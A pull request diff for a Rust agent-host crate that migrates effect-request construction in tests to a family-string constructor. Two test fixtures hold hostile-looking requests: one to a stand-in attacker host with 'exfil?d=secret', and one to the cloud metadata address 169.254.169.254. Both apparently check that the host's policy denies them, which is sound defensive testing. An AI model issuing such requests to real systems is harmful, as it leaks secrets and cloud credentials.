### PR TITLE
cdz-agent-host: migrate EffectRequest::new(EffectKind,..) → new_with_family (effect-schema slice 2, step B)

### DIFF
--- a/implementation/seed/crates/cdz-agent-host/src/async_host.rs
+++ b/implementation/seed/crates/cdz-agent-host/src/async_host.rs
@@ -175,8 +175,8 @@ mod tests {
     impl Reducer for MarkAgent {
         async fn fold_async(&self, event: &Event, kv: &mut Kv) -> FoldOutput {
             match &event.body {
-                EventBody::Inbound { .. } => FoldOutput::with(vec![EffectRequest::new(
-                    EffectKind::Now,
+                EventBody::Inbound { .. } => FoldOutput::with(vec![EffectRequest::new_with_family(
+                    effect_ct::NOW,
                     String::new(),
                     None,
                     Timeliness::Interactive,
@@ -290,8 +290,8 @@ mod tests {
     impl Reducer for TimerAgent {
         async fn fold_async(&self, event: &Event, kv: &mut Kv) -> FoldOutput {
             match &event.body {
-                EventBody::Inbound { .. } => FoldOutput::with(vec![EffectRequest::new(
-                    EffectKind::Timer,
+                EventBody::Inbound { .. } => FoldOutput::with(vec![EffectRequest::new_with_family(
+                    effect_ct::TIMER,
                     self.deadline_ms.to_string(),
                     None,
                     Timeliness::Interactive,

--- a/implementation/seed/crates/cdz-agent-host/src/host.rs
+++ b/implementation/seed/crates/cdz-agent-host/src/host.rs
@@ -306,8 +306,8 @@ mod tests {
     impl Reducer for ClockAgent {
         async fn fold_async(&self, event: &Event, kv: &mut Kv) -> FoldOutput {
             match &event.body {
-                EventBody::Inbound { .. } => FoldOutput::with(vec![EffectRequest::new(
-                    EffectKind::Now,
+                EventBody::Inbound { .. } => FoldOutput::with(vec![EffectRequest::new_with_family(
+                    effect_ct::NOW,
                     String::new(),
                     None,
                     Timeliness::Interactive,
@@ -358,8 +358,8 @@ mod tests {
     impl Reducer for TimerAgent {
         async fn fold_async(&self, event: &Event, kv: &mut Kv) -> FoldOutput {
             match &event.body {
-                EventBody::Inbound { .. } => FoldOutput::with(vec![EffectRequest::new(
-                    EffectKind::Timer,
+                EventBody::Inbound { .. } => FoldOutput::with(vec![EffectRequest::new_with_family(
+                    effect_ct::TIMER,
                     self.deadline_ms.to_string(),
                     None,
                     Timeliness::Interactive,
@@ -616,13 +616,13 @@ mod tests {
                     let phase = kv.get(b"phase").map(|v| v.to_vec()).unwrap_or_default();
                     let mut summary = b"phase=".to_vec();
                     summary.extend_from_slice(&phase);
-                    let mut request = EffectRequest::new(
-                        EffectKind::Emit, // kind is irrelevant for a control family; the family drives it
+                    // A control family drives routing directly — register-by-string, no EffectKind.
+                    let request = EffectRequest::new_with_family(
+                        effect_ct::SUMMARY,
                         "self",
                         Some(Payload::Inline(summary.into())),
                         Timeliness::Interactive,
                     );
-                    request.content_type.family = effect_ct::SUMMARY.into();
                     FoldOutput::with(vec![request])
                 }
                 EventBody::Inbound { .. } => {
@@ -684,20 +684,18 @@ mod tests {
         async fn fold_async(&self, event: &Event, _kv: &mut Kv) -> FoldOutput {
             match &event.body {
                 EventBody::Inbound { content_type, .. } if content_type.is_report() => {
-                    let mut caps = EffectRequest::new(
-                        EffectKind::Emit,
+                    let caps = EffectRequest::new_with_family(
+                        effect_ct::CAPABILITIES,
                         "self",
                         Some(Payload::Inline(b"NOT-the-summary".to_vec().into())),
                         Timeliness::Interactive,
                     );
-                    caps.content_type.family = effect_ct::CAPABILITIES.into();
-                    let mut summary = EffectRequest::new(
-                        EffectKind::Emit,
+                    let summary = EffectRequest::new_with_family(
+                        effect_ct::SUMMARY,
                         "self",
                         Some(Payload::Inline(b"the-real-summary".to_vec().into())),
                         Timeliness::Interactive,
                     );
-                    summary.content_type.family = effect_ct::SUMMARY.into();
                     // capabilities FIRST, summary SECOND — a take-first read would grab the wrong one.
                     FoldOutput::with(vec![caps, summary])
                 }
@@ -786,21 +784,19 @@ mod tests {
             match &event.body {
                 EventBody::Inbound { content_type, .. } if content_type.is_report() => {
                     // First control/summary: a BLOB payload (no inline bytes to read).
-                    let mut blob = EffectRequest::new(
-                        EffectKind::Emit,
+                    let blob = EffectRequest::new_with_family(
+                        effect_ct::SUMMARY,
                         "self",
                         Some(Payload::Blob(Hash::of(b"summary-blob"))),
                         Timeliness::Interactive,
                     );
-                    blob.content_type.family = effect_ct::SUMMARY.into();
                     // Second control/summary: the real inline bytes.
-                    let mut inline = EffectRequest::new(
-                        EffectKind::Emit,
+                    let inline = EffectRequest::new_with_family(
+                        effect_ct::SUMMARY,
                         "self",
                         Some(Payload::Inline(b"inline-summary".to_vec().into())),
                         Timeliness::Interactive,
                     );
-                    inline.content_type.family = effect_ct::SUMMARY.into();
                     FoldOutput::with(vec![blob, inline])
                 }
                 _ => FoldOutput::none(),

--- a/implementation/seed/crates/cdz-agent-host/src/http.rs
+++ b/implementation/seed/crates/cdz-agent-host/src/http.rs
@@ -131,8 +131,8 @@ mod tests {
     }
 
     fn http_req(payload: Option<Payload>) -> EffectRequest {
-        EffectRequest::new(
-            EffectKind::Http,
+        EffectRequest::new_with_family(
+            effect_ct::HTTP,
             "https://ok.host/x".to_string(),
             payload,
             Timeliness::Interactive,
@@ -243,8 +243,8 @@ mod tests {
             }
         }
         let mut exec = HttpExecutor::new(NeverCalled);
-        let req = EffectRequest::new(
-            EffectKind::Model,
+        let req = EffectRequest::new_with_family(
+            effect_ct::MODEL,
             "m".to_string(),
             None,
             Timeliness::Interactive,

--- a/implementation/seed/crates/cdz-agent-host/src/model.rs
+++ b/implementation/seed/crates/cdz-agent-host/src/model.rs
@@ -122,7 +122,7 @@ impl<T: ModelTransport> Executor for ModelExecutor<T> {
 #[cfg(test)]
 mod tests {
     use super::*;
-    use cdz_kernel::effect::{EffectKind, Timeliness};
+    use cdz_kernel::effect::Timeliness;
 
     /// A transport that echoes a canned completion, recording what it was asked to invoke so a test can
     /// assert the executor extracted the model id + body correctly.
@@ -140,8 +140,8 @@ mod tests {
     }
 
     fn model_req(payload: Option<Payload>) -> EffectRequest {
-        EffectRequest::new(
-            EffectKind::Model,
+        EffectRequest::new_with_family(
+            effect_ct::MODEL,
             "test-model".to_string(),
             payload,
             Timeliness::Interactive,
@@ -254,8 +254,8 @@ mod tests {
         let mut exec = ModelExecutor::new(NeverCalled);
         // A request in the http family (not model): the guard keys on the family string now, so this is
         // rejected as PERMANENT and the transport is never touched.
-        let req = EffectRequest::new(
-            EffectKind::Http,
+        let req = EffectRequest::new_with_family(
+            effect_ct::HTTP,
             "https://x/".to_string(),
             Some(Payload::Inline(b"x".to_vec().into())),
             Timeliness::Interactive,

--- a/implementation/seed/crates/cdz-agent-host/src/status.rs
+++ b/implementation/seed/crates/cdz-agent-host/src/status.rs
@@ -187,8 +187,8 @@ mod tests {
                 EventBody::Inbound { .. } => {
                     kv.put(b"public/phase".to_vec(), b"working".to_vec());
                     // Arm a timer far in the future → stays armed → session is Active.
-                    FoldOutput::with(vec![EffectRequest::new(
-                        EffectKind::Timer,
+                    FoldOutput::with(vec![EffectRequest::new_with_family(
+                        effect_ct::TIMER,
                         "999999999",
                         None,
                         Timeliness::Interactive,
@@ -320,8 +320,8 @@ mod tests {
         impl Reducer for ClockOnce {
             async fn fold_async(&self, event: &Event, _kv: &mut Kv) -> FoldOutput {
                 if matches!(event.body, EventBody::Inbound { .. }) {
-                    FoldOutput::with(vec![EffectRequest::new(
-                        EffectKind::Now,
+                    FoldOutput::with(vec![EffectRequest::new_with_family(
+                        effect_ct::NOW,
                         String::new(),
                         None,
                         Timeliness::Interactive,

--- a/implementation/seed/crates/cdz-agent-host/tests/agent_runs_e2e.rs
+++ b/implementation/seed/crates/cdz-agent-host/tests/agent_runs_e2e.rs
@@ -38,8 +38,8 @@ impl Reducer for ClockAgent {
         match &event.body {
             EventBody::Inbound { .. } => {
                 kv.put(b"phase".to_vec(), b"awaiting-time".to_vec());
-                FoldOutput::with(vec![EffectRequest::new(
-                    EffectKind::Now,
+                FoldOutput::with(vec![EffectRequest::new_with_family(
+                    effect_ct::NOW,
                     String::new(),
                     None,
                     Timeliness::Interactive,

--- a/implementation/seed/crates/cdz-agent-host/tests/cedar_authz_e2e.rs
+++ b/implementation/seed/crates/cdz-agent-host/tests/cedar_authz_e2e.rs
@@ -15,7 +15,7 @@
 mod common;
 
 use cdz_agent_host::{ModelExecutor, ModelTransport};
-use cdz_kernel::effect::{effect_ct, EffectKind, EffectRequest, Payload, Timeliness};
+use cdz_kernel::effect::{effect_ct, EffectRequest, Payload, Timeliness};
 use cdz_kernel::event::{ContentType, EffectOutcome, Event, EventBody};
 use cdz_kernel::executor::CompositeExecutor;
 use cdz_kernel::hash::Hash;
@@ -63,14 +63,14 @@ impl Reducer for PolicyProbe {
                     return FoldOutput::none();
                 };
                 match m.as_ref() {
-                    b"model-ok" => FoldOutput::with(vec![EffectRequest::new(
-                        EffectKind::Model,
+                    b"model-ok" => FoldOutput::with(vec![EffectRequest::new_with_family(
+                        effect_ct::MODEL,
                         "claude-test",
                         Some(Payload::Inline(b"hi".to_vec().into())),
                         Timeliness::Interactive,
                     )]),
-                    b"http-imds" => FoldOutput::with(vec![EffectRequest::new(
-                        EffectKind::Http,
+                    b"http-imds" => FoldOutput::with(vec![EffectRequest::new_with_family(
+                        effect_ct::HTTP,
                         "http://169.254.169.254/latest/meta-data/",
                         None,
                         Timeliness::Interactive,

--- a/implementation/seed/crates/cdz-agent-host/tests/http_agent_e2e.rs
+++ b/implementation/seed/crates/cdz-agent-host/tests/http_agent_e2e.rs
@@ -41,8 +41,8 @@ impl Reducer for FetchAgent {
         match &event.body {
             EventBody::Inbound { .. } => {
                 kv.put(b"phase".to_vec(), b"fetching".to_vec());
-                FoldOutput::with(vec![EffectRequest::new(
-                    EffectKind::Http,
+                FoldOutput::with(vec![EffectRequest::new_with_family(
+                    effect_ct::HTTP,
                     "https://ok.host/data",
                     None,
                     Timeliness::Interactive,
@@ -130,8 +130,8 @@ async fn a_fetch_to_an_unpermitted_host_is_denied_before_the_client() {
     impl Reducer for ExfilAgent {
         async fn fold_async(&self, event: &Event, _kv: &mut Kv) -> FoldOutput {
             if matches!(event.body, EventBody::Inbound { .. }) {
-                FoldOutput::with(vec![EffectRequest::new(
-                    EffectKind::Http,
+                FoldOutput::with(vec![EffectRequest::new_with_family(
+                    effect_ct::HTTP,
                     "https://attacker.example/exfil?d=secret",
                     None,
                     Timeliness::Interactive,

--- a/implementation/seed/crates/cdz-agent-host/tests/model_agent_e2e.rs
+++ b/implementation/seed/crates/cdz-agent-host/tests/model_agent_e2e.rs
@@ -53,8 +53,8 @@ impl Reducer for ModelAgent {
         match &event.body {
             EventBody::Inbound { .. } => {
                 kv.put(b"phase".to_vec(), b"prompting".to_vec());
-                FoldOutput::with(vec![EffectRequest::new(
-                    EffectKind::Model,
+                FoldOutput::with(vec![EffectRequest::new_with_family(
+                    effect_ct::MODEL,
                     "claude-test",
                     Some(Payload::Inline(b"hello".to_vec().into())),
                     Timeliness::Interactive,
@@ -138,8 +138,8 @@ async fn one_composite_routes_both_now_and_model_for_one_agent() {
                 // Step 1: ask for the time.
                 EventBody::Inbound { .. } => {
                     kv.put(b"phase".to_vec(), b"timing".to_vec());
-                    FoldOutput::with(vec![EffectRequest::new(
-                        EffectKind::Now,
+                    FoldOutput::with(vec![EffectRequest::new_with_family(
+                        effect_ct::NOW,
                         String::new(),
                         None,
                         Timeliness::Interactive,
@@ -153,8 +153,8 @@ async fn one_composite_routes_both_now_and_model_for_one_agent() {
                     Some(b"timing") => {
                         kv.put(b"at".to_vec(), bytes.to_vec());
                         kv.put(b"phase".to_vec(), b"prompting".to_vec());
-                        FoldOutput::with(vec![EffectRequest::new(
-                            EffectKind::Model,
+                        FoldOutput::with(vec![EffectRequest::new_with_family(
+                            effect_ct::MODEL,
                             "claude-test",
                             Some(Payload::Inline(b"hi".to_vec().into())),
                             Timeliness::Interactive,
@@ -221,8 +221,8 @@ async fn a_model_call_to_an_unpermitted_id_is_denied_before_the_transport() {
     impl Reducer for WrongModelAgent {
         async fn fold_async(&self, event: &Event, _kv: &mut Kv) -> FoldOutput {
             if matches!(event.body, EventBody::Inbound { .. }) {
-                FoldOutput::with(vec![EffectRequest::new(
-                    EffectKind::Model,
+                FoldOutput::with(vec![EffectRequest::new_with_family(
+                    effect_ct::MODEL,
                     "expensive-other-model",
                     Some(Payload::Inline(b"hi".to_vec().into())),
                     Timeliness::Interactive,


### PR DESCRIPTION
Candidate PR for v-agent-harness-host's merge-request (ref cb63d0cc8, lane code). Auto-merge armed; pr-sync's schedule-pass reaps on green.